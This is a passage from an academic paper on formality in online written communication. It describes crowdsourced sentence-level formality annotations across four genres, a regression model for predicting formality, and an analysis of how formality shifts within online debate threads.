aspect of meaning. To enable real advancements in dialog systems, information extraction, and human-computer interaction, computers need to understand the entirety of what humans say, both the literal and the non-literal. In this paper, we focus on the ∗ Research performed while at Yahoo Labs. particular stylistic dimension illustrated above: formality. Formality has long been of interest to linguists and sociolinguists, who have observed that it subsumes a range of dimensions of style in- cluding serious-trivial, polite-casual, and level of shared knowledge (Irvine, 1979; Brown and Fraser, 1979). The formal-informal dimension has even been called the “most important di- mension of variation between styles” (Heylighen and Dewaele, 1999). A speaker’s level of formal- ity can reveal information about their familiar- ity with a person, opinions of a topic, and goals for an interaction (Hovy, 1987; Endrass et al., 2011). As a result, the ability to recognize for- mality is an integral part of dialogue systems (Mairesse, 2008; Mairesse and Walker, 2011; Battaglino and Bickmore, 2015), sociolinguistic analyses (Danescu-Niculescu-Mizil et al., 2012; Justo et al., 2014; Krishnan and Eisenstein, 2015), human-computer interaction (Johnson et al., 2005; Khosmood and Walker, 2010), summa- rization (Sidhaye and Cheung, 2015), and au- tomatic writing assessment (Felice and Deane, 2012). Formality can also indicate context- independent, universal statements (Heylighen and Dewaele, 1999), making formality detection relevant for tasks such as knowledge base popu- lation (Suh et al., 2006; Reiter and Frank, 2010) and textual entailment (Dagan et al., 2006). This paper investigates formality in online written communication. The contributions are as follows: 1) We provide an analysis of humans’ subjective perceptions of formality in four dif- ferent genres. We highlight areas of high and low agreement and extract patterns that consis- 61 Transactions of the Association for Computational Linguistics, vol. 4, pp. 61–74, 2016. Action Editor: Janyce Wiebe and Kristina Toutanova. Submission batch: 10/2015; Revision batch: 12/2015; Published 3/2016. c©2016 Association for Computational Linguistics. Distributed under a CC-BY 4.0 license. tently differentiate formal from informal text. 2) We develop a state-of-the-art statistical model for predicting formality at the sentence level, evaluate the model’s performance against hu- man judgments, and compare differences in the effectiveness of features across genres. 3) We apply our model to analyze language use in on- line debate forums. Our results provide new ev- idence in support of theories of linguistic coordi- nation, underlining the importance of formality for language generation systems. 4) We release our new dataset of 6,574 sentences annotated for formality level. 2 Related Work There is no generally agreed upon definition as to what constitutes formal language. Some de- fine formality in terms of situational factors, such as social distance and shared knowledge (Sigley, 1997; Hovy, 1987; Lahiri et al., 2011). Other recent work adopts a less abstract defi- nition which is similar to the notion of “noisy text”– e.g. use of slang and poor grammar (Mosquera and Moreda, 2012a; Peterson et al., 2011). As a result, many rules have been ex- plored for recognizing and generating informal language. Some of these rules are abstract, such as the level of implicature (Heylighen and De- waele, 1999; Lahiri, 2015) or the degree of sub- jectivity (Mosquera and Moreda, 2012a), while others are much more concrete, such as the num- ber of adjectives (Fang and Cao, 2009) or use of contractions (Abu Sheikha and Inkpen, 2011). Much prior work on detecting formality has focused on the lexical level (Brooke et al., 2010; Brooke and Hirst, 2014; Pavlick and Nenkova, 2015). For larger units of text, perhaps the best-known method for measuring formality is the F-score1 (Heylighen and Dewaele, 1999), which is based on relative part-of-speech fre- quencies. F-score and its more recent variants (Li et al., 2013) provide a coarse measure of for- mality, but are designed to work at the genre- level, making them less reliable for shorter units of text such as sentences (Lahiri, 2015). Exist- 1We use special font to denote Heylighen and De- waele’s F-score to avoid confusion with F1 measure. ing statistical approaches to detecting formal- ity (Abu Sheikha and Inkpen, 2010; Peterson et al., 2011; Mosquera and Moreda, 2012b) have treated the problem as a binary classification task and relied heavily on word lists to differen- tiate the two classes. Linguistics literature sup- ports treating formality as a continuum (Irvine, 1979; Heylighen and Dewaele, 1999), as has been done in studies of other pragmatic dimensions such as politeness (Danescu-Niculescu-Mizil et al., 2013) and emotiveness (Walker et al., 2012). Lahiri et al. (2011) provided a preliminary in- vestigation of annotating formality on an ordi- nal scale and released a dataset of sentence-level formality annotations (Lahiri, 2015), but did not use their data in any computational tasks. This paper extends prior work by (i) introducing a statistical regression model of formality which is based on an empirical analysis of human per- ceptions rather than on heuristics and (ii) by applying that model to a linguistic analysis of online discussions. 3 Human perceptions of formality Before we can automatically recognize formal- ity, we need an understanding of what it means for language to be formal or informal. As we discussed in Section 2, a number of theories ex- ist with no clear consensus. In this work, we do not attempt to develop a concrete definition of formality, but instead take a bottom-up ap- proach in which we assume that each individual has their own definition of formality. This ap- proach of using unguided human judgments has been suggested by Sigley (1997) as one of the most reliable ways to get a gold-standard mea- sure of formality, and has been applied in prior computational linguistics studies of pragmatics (Danescu-Niculescu-Mizil et al., 2013; Lahiri, 2015). We aim to answer: do humans’ individual intuitions collectively provide a coherent notion of formality (§3.2)? And, if so, which linguistic factors contribute to this notion (§3.3)? 3.1 Data and Annotation Since formality varies substantially across gen- res (Li et al., 2013), we look at text from four different genres: News, Blogs, Emails, and com- 62 (a) Answers (µ=-0.7,σ=1.3) (b) Blogs (µ=0.2,σ=1.1) (c) Emails (µ=0.5,σ=1.4) (d) News (µ=0.7,σ=0.86) Figure 1: Distribution of sentence-level formality scores by genre. Answers 2.8 That is in addition to any customs duties that may be assessed. Answers -3.0 (LOL) jus kidding...the answer to your question is GAS PRICES!!! News 2.6 Baghdad is a city of surprising topiary sculptures: leafy ficus trees are carved in geometric spirals, balls, arches and squares, as if to impose order on a chaotic sprawl. News -2.2 He bought and bought and never stopped. Table 1: Examples of formal (positive) and informal (negative) sentences in different genres. Scores are taken as the mean of 5 human judgments on a scale from -3 to 3. munity question answering forums (henceforth “Answers”). Lahiri (2015) released a corpus of sentence-level formality annotations, which contains 2,775 news and 1,821 blog sentences. In addition we take a random sample of 1,701 sentences from professional emails2 and 4,977 sentences from Yahoo Answers.3 We follow the protocol used in Lahiri (2015) in order to gather judgments on Amazon Mechanical Turk for the Email and Answers data. Specifically, we use a 7-point Likert scale, with labels from -3 (Very Informal) to 3 (Very Formal). So as not to bias the annotators with our own no- tions of formality, we provide only a brief de- scription of formal language and encourage an- notators to follow their instincts when making their judgments. We use the mean of 5 anno- tators’ scores as the overall formality score for each sentence.4 Our newly collected annotations have been made public.5 For more information on the annotation, please refer to the supple- 2 http://americanbridgepac.org/ jeb-bushs-gubernatorial-email-archive/ 3 https://answers.yahoo.com/ 4In total, we had 301 annotators, meaning each anno- tator labeled 22 sentences on average. 5 http://www.seas.upenn.edu/~nlp/resources/ formality-corpus.tgz mentary material to this paper.6 3.2 Analysis Figure 1 shows the distribution of mean formal- ity scores for the sentences in each of our genres. We see that News is the most formal of our do- mains and Answers is the least. However, we can see anecdotally (Table 1) that the standard of what constitutes “informal” depends heavily on the genre: an informal sentence from News is much more formal than one from Answers. We can also see clear differences in the variance of sentence formalities within each genre. In gen- eral, the interactive genres (Email and Answers) show a much flatter distribution than do the in- formational genres (News and Blogs). Inter-annotator agreement. We want to know whether individuals’ intuitions about for- mal language result in a coherent collective no- tion of formality. To quantify this, we measure whether annotators’ ordinal ratings of formality are well correlated and whether their categor- ical judgments are in agreement. For the for- mer, we use intraclass correlation7 (ICC) which 6 http://www.seas.upenn.edu/~epavlick/papers/ formality_supplement.pdf 7We report the average raters absolute agreement (ICC1k) using the psych package in R: https://cran. 63 http://americanbridgepac.org/jeb-bushs-gubernatorial-email-archive/ http://americanbridgepac.org/jeb-bushs-gubernatorial-email-archive/ https://answers.yahoo.com/ http://www.seas.upenn.edu/~nlp/resources/formality-corpus.tgz http://www.seas.upenn.edu/~nlp/resources/formality-corpus.tgz http://www.seas.upenn.edu/~epavlick/papers/formality_supplement.pdf http://www.seas.upenn.edu/~epavlick/papers/formality_supplement.pdf https://cran.r-project.org/web/packages/psych/psych.pdf 3,3,3,3,3 Formal I would trust the social workers to make the appropriate case by case determination . -3,-3,-3,-3,-3 Informal * what the world needs is only more of U & UR smile ! ! -3,-2,0,-1,3 Mixed Governor, if this was intentionally done, whoever did it has at least one vote to go to hell. -1,0,0,0,1 Neutral You should try herbal peppermint tea. Table 2: Examples of sentences with different patterns of agreement. Numbers show the list of scores assigned by the 5 annotators. Some sentences exhibit “mixed” formality, i.e. workers were split on whether to call the sentence generally informal or generally formal, while others are “neutral,” i.e. workers agreed the sentence was neither formal nor informal. is similar to Pearson ρ but accounts for the fact that we have different groups of annotators for each sentence. For the latter, we use a quadratic weighted κ, which is a variation of Cohen’s κ better fit for measuring agreement on ordinal scales.8 When using crowdsourced labels, com- puting reliable measures of κ is difficult since, for a given pair of annotators, the number of items for which both provided a label is likely small. We therefore simulate two annotators as follows. For each sentence, we randomly choose one annotator’s label to be the label of Annota- tor 1 and we take the mean label of the other 4 annotators, rounded to the nearest integer, to be the label of Annotator 2. We then compute κ for these two simulated annotators. We repeat this process 1,000 times, and report the median and 95% confidence interval (Table 3). N ICC Weighted κ Answers 4,977 0.79 ±0.01 0.54±0.05 Blog 1,821 0.58 ±0.03 0.31±0.05 Email 1,701 0.83 ±0.02 0.59±0.04 News 2,775 0.39±0.05 0.17±0.06 Table 3: Annotator agreement measured by in- traclass correlation (ICC) and categorical agree- ment (quadratic weighted κ) for each genre. Agreement is reasonably strong across genres, with the exception of News, which appears to be the most difficult to judge. Table 2 sheds light on the types of sentences that receive high and low levels of agreement. At the extreme ends r-project.org/web/packages/psych/psych.pdf 8Weighted κ penalizes large disagreements more than small disagreements. E.g. if Annotator 1 labels a sen- tence as −2 and Annotator 2 labels it −3, this is penal- ized less than if Annotator 1 chooses −2 and Annotator 2 chooses +3. of the spectrum where agreement is very high (mean scores near −3 and +3), we see sentences which are unambiguously formal or informal. However, in the middle (mean scores near 0) we see both high and low agreement sentences. High agreement sentences tend to be “neutral,” i.e. annotators agree they are neither formal nor informal, while the low-agreement sentences tend to exhibit “mixed” formality, i.e. they con- tain both formal and informal sub-sentential ele- ments. We leave the topic of sub-sentential for- mality for future work, and instead allow our use of the mean score to conflate mixed formal- ity with neutral formality. This fits naturally into our treatment of formality as a continuous as opposed to a binary attribute. 3.3 Factors affecting formality From the above analysis, we conclude that hu- mans have a reasonably coherent concept of for- mality. However, it is difficult to tease apart perceived formality differences that arise from the literal meaning of the text (e.g. whether the topic is serious or trivial) as opposed to arising from the style in which those ideas are expressed. To get a better understanding of the stylistic choices that differentiate formal from informal, we ran a second experiment in which we asked annotators to rewrite informal sentences in order to make them more formal. The goal is to isolate some of the linguistic factors that contribute to perceived formality while constraining the literal content of the text to be the same. We use this data for analysis in this section, as well as for evaluation in Section 4.2. For this task, we chose 1,000 sentences from the Answers dataset, since it displays the widest variety of topics and styles. We attempt to 64 https://cran.r-project.org/web/packages/psych/psych.pdf https://cran.r-project.org/web/packages/psych/psych.pdf https://cran.r-project.org/web/packages/psych/psych.pdf https://cran.r-project.org/web/packages/psych/psych.pdf https://cran.r-project.org/web/packages/psych/psych.pdf https://cran.r-project.org/web/packages/psych/psych.pdf https://cran.r-project.org/web/packages/psych/psych.pdf https://cran.r-project.org/web/packages/psych/psych.pdf https://cran.r-project.org/web/packages/psych/psych.pdf https://cran.r-project.org/web/packages/psych/psych.pdf https://cran.r-project.org/web/packages/psych/psych.pdf https://cran.r-project.org/web/packages/psych/psych.pdf https://cran.r-project.org/web/packages/psych/psych.pdf https://cran.r-project.org/web/packages/psych/psych.pdf https://cran.r-project.org/web/packages/psych/psych.pdf https://cran.r-project.org/web/packages/psych/psych.pdf https://cran.r-project.org/web/packages/psych/psych.pdf https://cran.r-project.org/web/packages/psych/psych.pdf https://cran.r-project.org/web/packages/psych/psych.pdf https://cran.r-project.org/web/packages/psych/psych.pdf https://cran.r-project.org/web/packages/psych/psych.pdf https://cran.r-project.org/web/packages/psych/psych.pdf https://cran.r-project.org/web/packages/psych/psych.pdf https://cran.r-project.org/web/packages/psych/psych.pdf https://cran.r-project.org/web/packages/psych/psych.pdf https://cran.r-project.org/web/packages/psych/psych.pdf https://cran.r-project.org/web/packages/psych/psych.pdf https://cran.r-project.org/web/packages/psych/psych.pdf Capitalization 50% i do not like walmart. I do not like Walmart. Punctuation 39% She’s 40, but she seems more like a 30!!!!! She is 40, but she seems more like 30! Paraphrase 33% Lexus cars are awesome! Lexus brand cars are very nice. Delete fillers 19% well it depends on that girl. It depends on the girl. Completion 17% looks good on your record. It looks good on your record. Add context 16% alive - i have seen that guy working at a 7-11 behnd the counter My opinion is that Osama Bin Laden is alive as I have encountered him working at a 7-11 store . Contractions 16% I really don’t like them. I really do not like them. Spelling 10% i love dancing iwth my chick friends. I enjoy dancing with my girlfriends. Normalization 8% juz try to put ur heart in to it. Just try to put your heart into it. Slang/idioms 8% that’s a big no. I do not agree. Politeness 7% uh, more details? Could you provide more details, please? Split sentences 4% [. . . ] not as tough... like high school [. . . ] not as tough. It’s like high school. Relativizers 3% sorry i ’ m not much help heh Sorry that I am not much help. Table 4: Frequency of types of edits/changes made in rewriting experiment, and examples of each. Note the categories are not mutually exclusive. choose sentences that are informal enough to permit formalizing, while covering all ranges of informality, from highly informal (“yep...love the pic lol”) to only slightly informal (“As long as you feel good.”). Each sentence is shown in the context of the question and the full an- swer post in which it appeared. We collect one rewrite per sentence, and manually remove spammers. People make a large variety of edits, which cover the “noisy text” sense of formality (e.g. punctuation fixes, lexical normalization) as well as the more situational sense (e.g. inserting politeness, providing context). To character- ize these different edit types, we manually re- viewed a sample of 100 rewrites and categorized the types of changes that were made. Table 4 gives the results of this analysis. Over half of the rewrites involved changes to capitalization and punctuation. A quarter involved some sort of lexical or phrasal paraphrase (e.g “awesome” → “very nice”). In 16% of cases, the rewritten sen- tence incorporated additional information that was apparent from the larger context, but not present in the original sentence. This accords with Heylighen and Dewaele (1999)’s definition of “deep” formality, which says that formal lan- guage strives to be less context-dependent. 4 Recognizing formality automatically In the above section, we asked whether humans can recognize formality and what contributes to their perception of formal or informal. We now ask: how well can computers automatically dis- tinguish formal from informal and which linguis- tic triggers are important for doing so? 4.1 Setup We use the data described in Section 3.1 for training, using the mean of the annotators’ scores as the gold standard labels. We train a ridge regression9 model with the model parame- ters tuned using cross validation on the training data. Unless otherwise specified, we keep gen- res separate, so that models are trained only on data from the genre in which they are tested. Features. We explore 11 different feature groups, described in Table 5. To the best of our knowledge, 5 of these feature groups (ngrams, word embeddings, parse tree pro- ductions, dependency tuples, and named en- tities) have not been explored in prior work on formality recognition. The remaining fea- tures (e.g. length, POS tags, case, punctua- tion, formal/informal lexicons, and subjectiv- ity/emotiveness) largely subsume the features explored by previously published classifiers. We use Stanford CoreNLP10 for all of our linguistic processing, except for subjectivity features, for which we use TextBlob.11 9 http://scikit-learn.org/ 10 http://nlp.stanford.edu/software/corenlp 11 https://textblob.readthedocs.org 65 http://scikit-learn.org/ http://nlp.stanford.edu/software/corenlp https://textblob.readthedocs.org case Number of entirely-capitalized words; binary indicator for whether sentence is lowercase; binary indi- cator for whether the first word is capitalized. *dependency One-hot features for the following dependency tuples, with lexical items backed off to POS tag: (gov, typ, dep), (gov, typ), (typ, dep), (gov, dep). *entity One-hot features for entity types (e.g. PERSON, LOCATION) occurring in the sentence; average length, in characters, of PERSON mentions. lexical Number of contractions in the sentence, normalized by length; average word length; average word log-frequency according to Google Ngram corpus; average formality score as computed by Pavlick and Nenkova (2015). *ngram One-hot features for the unigrams, bigrams, and trigrams appearing in the sentence. *parse Depth of constituency parse tree, normalized by sentence length; number of times each production rule appears in the sentence, normalized by sentence length, and not including productions with terminal symbols (i.e. lexical items). POS Number of occurrences of each POS tag, normalized by the sentence length. punctuation Number of ‘?’, ‘...’, and ‘!’ in the sentence. readability Length of the sentence, in words and characters; Flesch-Kincaid Grade Level score. subjectivity Number of passive constructions; number of hedge words, according to a word list; number of 1st person pronouns; number of 3rd person pronouns; subjectivity according to the TextBlob sentiment module; binary indicator for whether the sentiment is positive or negative, according to the TextBlob sentiment module. All of the counts are normalized by the sentence length. *word2vec Average of word vectors using pre-trained word2vec embeddings, skipping OOV words. Table 5: Summary of feature groups used in our model. To the best of our knowledge, those marked with (*) have not been previously studied in the context of detecting linguistic formality. Baselines. We measure the performance of our model using Spearman ρ with human labels. We compare against the following baselines: • Sentence length: We measure length in characters, as this performed slightly better than length in words. • Flesch-Kincaid grade level: FK grade level (Kincaid et al., 1975) is a function of word count and syllable count, designed to measure readability. We expect higher grade levels to correspond to more formal text. • F-score: Heylighen and Dewaele (1999)’s formality score (F-score) is a function of POS tag frequency which is designed to measure formality at the document- and genre-level. We expect higher F-score to correspond to more formal text. • LM perplexity: We report the perplex- ity according to a 3-gram language model trained on the English Gigaword with a vo- cabulary of 64K words. We hypothesize that sentences with lower perplexity (i.e. sentences which look more similar to edited news text) will tend to be more formal. We also explored using the ratio of the per- plexity according to an “informal” language model over the perplexity according to a “formal” language model as a baseline, but the results of this baseline were not compet- itive, and so, for brevity, we do not include them here. • Formality lexicons: We compare against the average word formality score according to the formality lexicon released by Brooke and Hirst (2014). We compute this score in the same way as Sidhaye and Cheung (2015), who used it to measure the formal- ity of tweets. • Ngram classifier: As our final baseline, we train a ridge regression model which uses only ngrams (unigrams, bigrams, and tri- grams) as features. Comparison against previously published models. Note that we are not able to make a meaningful comparison against against any of the previously published statistical models for formality detection. To our knowledge, there are three relevant previous publications that pro- duced statistical models for detecting formality: Abu Sheikha and Inkpen (2010), Peterson et al. (2011), and Mosquera and Moreda (2012b). All three of these models performed a binary clas- sification (as opposed to regression) and oper- 66 ated at the document (as opposed to sentence level). We were able to closely reimplement the model of Peterson et al. (2011), but we choose not to include the results here since their model was designed for binary email-level classification and thus relies on domain-specific features (e.g. casing in the subject line), that are not available in our real-valued, sentence-level datasets. The other models and the data/lexicons on which they relied are not readily available. For this reason, we do not compare directly against the previously published statistical models, but ac- knowledge that several of our features overlap with prior work (see Section 4.1 and Table 5). 4.2 Performance Table 6 reports our results on 10-fold cross val- idation. Using our full suite of features, we are able to achieve significant performance gains in all genres, improving by as much as 11 points over our strongest baseline (the ngram model). Answers Blogs Email News LM ppl 0.00 -0.01 0.14 -0.08 F-score 0.16 0.35 0.21 0.27 Length 0.23 0.51 0.53 0.34 F-K level 0.45 0.54 0.63 0.41 B&H lexicon 0.47 0.41 0.55 0.30 Ngram model 0.60 0.55 0.65 0.43 Classifier 0.70 0.66 0.75 0.48 Table 6: Spearman ρ with human judgments for our model and several baselines. Note that, while the basic LM perplexity cor- relates very weakly with formality overall, the Email genre actually exhibits a trend opposite of that which we expected: in Email, sentences which look less like Gigaword text (higher per- plexity) tend to be more formal. On inspec- tion, we see that many of the sentences which have low perplexity but which humans label as informal include sentences containing names and greeting/signature lines, as well as sentences which are entirely capitalized (capitalization is not considered by the LM). Contributions of feature groups. In order to gain better insight into how formality differs across genres, we look more closely at the perfor- mance of each feature group in isolation. Table 7 shows the performance of each feature group relative to the performance of the full classifier, for each genre. A few interesting results stand out. Ngram and word embedding features per- form well across the board, achieving over 80% of the performance of the full classifier in all cases. Casing and punctuation features are sig- nificantly more important in the Answers do- main than in the other domains. Constituency parse features and entity features carry notably more signal in the Blog and News domains than in the Email and Answers domains. Answers Blogs Email News ngram 0.84 0.85 0.84 0.91 word2vec 0.83 0.83 0.84 0.87 parse 0.70 0.89 0.74 0.89 readability 0.69 0.75 0.84 0.83 dependency 0.64 0.89 0.84 0.85 lexical 0.56 0.55 0.59 0.70 case 0.50 0.28 0.24 0.37 POS 0.49 0.74 0.67 0.74 punctuation 0.47 0.38 0.37 0.20 subjectivity 0.29 0.31 0.25 0.37 entity 0.14 0.63 0.34 0.72 Table 7: Relative performance of each feature group across genres. Numbers reflect the perfor- mance (Spearman ρ) of the classifier when using only the specified feature group, relative to the performance when using all feature groups. train\test Answers Blogs Email News Answers 0 -5 -5 -6 Blogs -17 0 -9 -2 Email -13 -4 0 -4 News -23 -4 -13 0 Table 8: Drop in performance (Spearman ρ × 100) when model is trained on sentences from one domain (row) and tested on sentences from another (column). Changes are relative to the performance when trained only on sentences from the test domain (represented by zeros along the diagonal). All models were trained on an equal amount of data. Observing these differences between data sets raises the question: how well does knowledge of formality transfer across domains? To answer this, we measure classifier performance when trained in one domain12 and tested in another (Table 8). In our experiments, the model trained 12All models were trained on an equal amount of data. 67 on Answers consistently provided the best per- formance out of domain, resulting in perfor- mance degradations of roughly 5 points (Spear- man ρ) compared to models trained on target domain data. Training on News and testing on Answers caused the largest drop (23 points com- pared to training on Answers). Pairwise classification. As a final evalua- tion, we use the 1,000 rewritten sentences from Section 3.3 as a held-out test set. This allows us to test that our classifier is learning real style differences, not just topic differences. We as- sume that workers’ rewrites indeed resulted in more formal sentences, and we frame the task as a pairwise classification in which the goal is to determine which of the two sentences (the original or the rewrite) is more formal. A ran- dom baseline achieves 50% accuracy. If we use the F-K readability measure, and assume the sentence with the higher grade level is the more formal of the two, we achieve only 57% accuracy. By running our supervised regression model and choosing the sentence with the higher predicted formality score as the more formal sentence, we achieve 88% accuracy, providing evidence that the model picks up subtle stylistic, not just topic, differences. 5 Formality in online discussions So far we have focused on building a model that can automatically distinguish between formal and informal sentences. We now use that model to analyze formality in practice, in the context of online discussion forums. We look to exist- ing theories of formality and of linguistic style matching to guide our analysis. In particular: • Formality is higher when the amount of shared context between speakers is low (Heylighen and Dewaele, 1999). • Formality is higher when speakers dislike one another (Fielding and Fraser, 1978). • Speakers adapt their language in order to match the linguistic style of those with whom they are interacting (Danescu- Niculescu-Mizil et al., 2011). Ladywolf I was checking out this website for Exodus International and I understand their mission is to provide an alternative for people who choose to be heterosexual. [...] I just find it hard to believe that they don’t somehow manipulate the situation in a less than fair way. joebrummer I started a thread earlier about just this! These groups are dangerous Ladywolf, There is so much evidence to support that [...] Ladywolf I thought so [...] I also see that they are running major newspaper ads...hmmm, how unbiased can a newspaper ad like this be? [...] I’m so glad I wasn’t raised a Christian because from the tone of some of the replies, some members of this cult can be pretty mean huh? joebrummer Yes, The are mean funny enough in the name of god. I was raised christian, catholic no less. I studied the bible, I was raised believing I would go to hell. That was tough. Ladywolf I bet that was tough [...] I was raised Jewish [...] It’s like so wierd because I’ve never had to deal with these types of people before. Figure 2: Example of a thread from our data. [...] indicates text has been left out to save space. With these hypotheses in mind, we explore how formality changes across topics and users (§5.2), how it relates to other pragmatic dimensions (§5.3), and how it changes over the lifetime of a thread (§5.4). Understanding these patterns is an important first step toward building systems that can interact with people in a pragmatically competent way. 5.1 Discussion Data Our data comes from the Internet Argument Corpus (IAC) dataset (Walker et al., 2012), a corpus of threaded discussions from online de- bate forums. The dataset consists of 388K posts covering 64 different topics, from Economics to Entertainment. We focus on threads in our anal- ysis, defined as chains of posts in which each is an explicit reply to the previous post (Figure 2). When the same user makes multiple consecutive posts in a thread (i.e. replies to their own post), we collapse these and treat them as a single post. In total, our data covers 104,625 threads. Automatic Classification. First, we assign a formality score to each post in our data us- ing the Answers model in Section 4. Since this model is designed for sentence-level prediction, we define the score of a post to be the mean score of the sentences in that post. We acknowl- edge that this approximation is not ideal; to con- firm that it will be sufficient for our analyses, we collect human judgments for 1,000 random posts using the same task setup as we used for the sentence-level judgments in Section 3.1. The 68 correlation of our predicted score with the mean human score is 0.58, which is within the range of inter-annotator agreement for labeling post formality (0.34 ≤ ρ ≤ 0.64).13 We take this as confirmation that the mean predicted sentence score is a decent approximation of human for- mality judgments for our purposes. Figure 3: Formality distribution of posts in 20 most popular topics in discussion data. The 10 most popular topics (*) are used in our other analyses. 5.2 How do topic and user affect formality? As formality is intertwined with many content- specific style dimensions such as “serious- trivial” (Irvine, 1979), we expect the overall for- mality level to differ across topics. Figure 3 confirms this– many topics are clearly skewed toward being formal14 (e.g. Economics) while others are skewed toward informal (e.g. Fun). However, every topic includes both formal and informal posts: there are informal posts in Eco- nomics (“Oh my! A poor person....how could this have happened!”) and formal posts in Fun (“Difficult to consider either one, or their vari- 13This range matches the agreement range observed for post-level politeness annotations (Danescu-Niculescu- Mizil et al., 2013). Note agreement is more varied at the post level than at the sentence level. This makes sense given the “mixed formality” phenomenon: i.e. for long posts, a range of formality can be expressed, making the choice of a single score more subjective. 14The range of post formalities is generally narrower than was the range of sentence formalities. While sentence-level scores range between -3 and 3, we find that 80% of post scores fall between -1 and 1. ations, as a viable beverage when beer is avail- able.”). We see a similar pattern when we look at post formality levels by user: while most people speak generally formally or generally informally (84% of users have a mean formality level that is significantly different from 0 at p < 0.01), nearly every user (91%) produces both formal and in- formal posts.15 This is true even when we look at users within one topic. These results are in- teresting: they suggest that while the formality of a post is related to the topic of discussion and to the individual speaker, these alone do not explain formality entirely. Rather, as the aforementioned theories suggest, the same per- son discussing the same topic may become more or less formal in response to pragmatic factors. 5.3 How does formality relate to other pragmatic styles? Formality is often considered to be highly re- lated with, and even to subsume, several other stylistic dimensions including politeness, impar- tiality, and intimacy. Heylighen and Dewaele (1999) suggest that formality is higher when shared social context is lower, and thus lan- guage should be more formal when directed at larger audiences or speaking about abstract con- cepts. Fielding and Fraser (1978) further sug- gest that informality is an important way of ex- pressing closeness with someone, and thus for- mality should be higher when speakers dislike one another. To investigate these ideas further, we look at how formality correlates with human judgments of several other pragmatic dimensions. We use the manual style annotations that are released for a subset of post-reply pairs (3K total) in the IAC dataset (Walker et al., 2012). These anno- tations include, for example, the extent to which the reply agrees/disagrees with the post and the extent to which the reply is insulting/respectful of the post. Each of these dimensions has been rated by human annotators on a Likert scale, similar to our own formality annotations. Addi- tionally, to investigate how formality correlates 15We consider posts with scores > 0.25 as “formal” and those with scores < −0.25 as “informal.” 69 Emotional The main cause of so much hate and disrespect is the phony war we’re fighting and our tactics in violation of international law, our attitude of superiority in the world, and our bullying of others. Impolite As a former administrator, and therefore a veteran editor who knows how wikipedia really works, I am actually surprised you would even ask such a question with such an obvious answer. Insulting And here ladies and gentlemen we have the evidence of why I am justified in calling the likes of ‘stormboy’ an idiot. Sarcastic Thank you for bringing to my attention that atoms, neutrons and protons are merely scientific assumptions. Now as I gaze at the night sky with all its bits and pieces spinning around each other I can sleep happily knowing that our solar system is not part of a housebrick afterall. Table 9: Formal posts exhibiting style properties often thought not to co-occur with formality. with politeness, we use the the Stanford Po- liteness Corpus (Danescu-Niculescu-Mizil et al., 2013), which consists of 11K short posts from Wikipedia discussion forums which again have been manually annotated on an ordinal scale. Our results are generally consistent with what theories suggest. We find that posts which are targeted toward more general audiences (as op- posed to specific people) and which make fact- based (as opposed to emotion-based) arguments are generally more formal (ρ = 0.32 and 0.17, respectively), and that formality is significantly positively correlated with politeness (ρ = 0.14). We find significant negative correlations be- tween formality and the extent to which the post is seen as sarcastic (ρ = −0.25) or insulting (ρ = −0.22). Interestingly, we do not find a sig- nificant correlation between formality and the degree of expressed agreement/disagreement. While the directions of these relationships match prior theories and our intuitions, the strength of the correlation in many cases is weaker than we expected to see. Table 9 pro- vides examples of some of the less intuitive co- occurences of style, e.g. impolite but formal posts. These examples illustrate the complex- ity of the notion of formality, and how formal language can be used to give the impression of social distance while still allowing the speaker’s emotions and personality to be very apparent. 5.4 How does formality change throughout a discussion? Prior work has revealed that speakers often adapt their language to match the language of those with whom they are interacting (Danescu- Niculescu-Mizil et al., 2011). We therefore inves- tigate how formality changes over the lifetime of a thread. Do discussions become more or less formal over time? Do speakers’ levels of formal- ity interact with one another? For these analyses, we focus on threads from 5 to 20 posts in length. Because threads can branch, multiple threads might share a prefix sequence of posts. To avoid double counting, we group together threads which stem from the same post and randomly chose one thread from each such group, throwing away the rest. Following the theory that formality is deter- mined by the level of shared context, Heylighen and Dewaele (1999) hypothesize that formality should be highest at the beginning of a conversa- tion, when no context has been established. We observe that, in fact, the first posts have signif- icantly higher formality levels on average than do the remaining posts in the thread (Figure 4). Once a context is established and a discus- sion begins, the theory of linguistic style match- ing suggests that people change their language to match that of others in the conversation (Niederhoffer and Pennebaker, 2002; Danescu- Niculescu-Mizil et al., 2011). Is this phe- nomenon true of formality? Does a person’s level of formality reflect the formality of those with whom they are speaking? Figure 2 shows an example thread in which the speakers together move toward more infor- mal tone as the conversation becomes more per- sonal. To see if this kind of formality matching is the case in general, we use a linear mixed ef- fects model.16 Briefly, a mixed effects model is 16We use the mixed effects model with random intercepts provided by the statsmodels python package: http://statsmodels.sourceforge.net/devel/mixed_ 70 http://statsmodels.sourceforge.net/devel/mixed_linear.html Initial I wish to have a formal debate in the Debate Tournaments section on global warming. I propose the subject title of ”Global Warming is both occuring and has been shown to be at least in part caused by human activity” I will take the afirmative position. Anyone want to argue the opposite? Reply Global warming is a controversy. Personally I am like hundred of maybe thousands if not millions of people that think it is liberal ###. The hole in the ozone layer is false, and I am sure this is too. Initial The US military says that Saddam Hussein’s briefcase contained transcripts of meetings with terrorists, contact information for those terrorists, and information on financial transactions that he carried out. [...] I wonder what else was in the briefcase. [...] Reply Transcripts? Strange. I would be curious too. Figure 4: On average, first posts are significantly more formal than later posts. Left: mean formality of posts by position in thread. Right: some examples where formal initial posts are followed by less formal replies. (Note: 4forums.com replaces expletives with #s.) a regression analysis that allows us to measure the influence of various “fixed effects” (e.g. the formality of the prior post) on a post’s formality, while controlling for the “random effects” which prevent us from treating every post as an inde- pendent observation. In our case, we treat the topic and the author as random effects, i.e. we acknowledge that the formality levels of posts in the same topic by the same author are not inde- pendent, and we want to control for this when measuring the effects of other variables. We include 7 fixed effects in our model of a post’s formality: the formality of the previous post, the number of prior posts in the thread (position), the number of prior posts by this au- thor in the thread (veteran level), the length of the entire thread, the total number of partici- pants in the entire thread, and the lengths of the current and prior posts. We also include the pairwise interactions between these fixed effects. We include the topic and author as a random ef- fect. For these analyses, we omit the first post in every thread, as prior analysis suggests that the function of the first post, and its formality, is markedly different from that of later posts. Table 10 gives the most significant results from our regression. We observe several inter- esting significant effects, such as a negative re- lationship between the number of times an au- thor has posted in the thread and their formal- ity level: i.e. people are more informal the more they post. However, the single best predictor of the formality of a post is the formality of the post to which it is replying. The estimated ef- linear.html. Coefficient Previous score 0.219 Veteran level −0.078 Thread length 0.020 Number of participants −0.010 Previous score × position 0.009 Position 0.008 Table 10: Estimated coefficients of variables strongly related to the formality of a post, con- trolling for topic- and author-specific random ef- fects. All effects are significant at p < 0.0001. × signifies an interaction between variables. fect size is 0.22, meaning, all else being equal, we expect 